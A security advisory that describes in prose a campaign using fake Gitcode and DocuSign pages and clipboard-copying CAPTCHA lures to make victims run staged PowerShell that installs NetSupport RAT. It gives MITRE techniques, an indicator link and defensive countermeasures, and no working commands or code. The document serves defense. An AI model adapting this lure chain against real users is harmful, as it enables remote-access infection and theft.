VTA-004518 – Malicious Scripts Delivered via Fake Gitcode and Docusign Pages

A new cyber campaign is using fake websites impersonating Gitcode and DocuSign to trick users into running malicious PowerShell scripts, ultimately infecting systems with NetSupport RAT malware. Researchers found that these deceptive sites prompt victims to copy and execute PowerShell commands, which then download additional scripts from external servers.

The attack involves multiple stages, where each script retrieves and runs another, eventually deploying the remote access trojan (RAT). Some spoofed DocuSign sites use CAPTCHA verification lures—when users complete the check, a malicious PowerShell command is silently copied to their clipboard. Victims are then instructed to paste and run it via the Windows Run dialog, unknowingly triggering the infection.

The script establishes persistence by downloading a file from GitHub, ensuring the malware runs at system startup. Further stages retrieve a ZIP archive containing an executable that installs NetSupport RAT. This multi-stage approach helps evade detection and complicates investigations.

While the attackers remain unidentified, the tactics resemble past SocGholish (FakeUpdates) campaigns. NetSupport Manager, a legitimate tool, has been frequently abused by threat actors like FIN7 and Storm-0408 for remote access.

Severity:
Medium

Attack Surface:
Email, Endpoint, Remote Access Service, Web Browser

Tactics:
Command and Control, Defense Evasion, Execution, Initial Access, Persistence

Techniques:
T1059.001 – Command-Line Interface: PowerShell
T1071.001 – Application Layer Protocol: Web Protocols
T1105 – Ingress Tool Transfer
T1547.001 – Boot or Logon Autostart Execution: Registry Run Keys
T1204.002 – User Execution: Malicious File
T1566.002 – Phishing: Spearphishing Link

Indicator of Compromise :
1. https://otx.alienvault.com/pulse/6841edc5bd14ff20dc36b897

References:
1. https://dti.domaintools.com/how-threat-actors-exploit-human-trust/

SuperPRO’s Threat Countermeasures Procedures:
1. Avoid copying and running PowerShell commands from untrusted websites.
2. Verify website URLs before interacting with login or CAPTCHA prompts.
3. Disable automatic script execution in PowerShell via Group Policy.
4. Monitor clipboard activity for unexpected PowerShell commands.
5. Keep endpoint security tools updated to detect multi-stage script attacks.
6. Educate users on social engineering tactics involving fake verification checks.

Contributed by: Fatini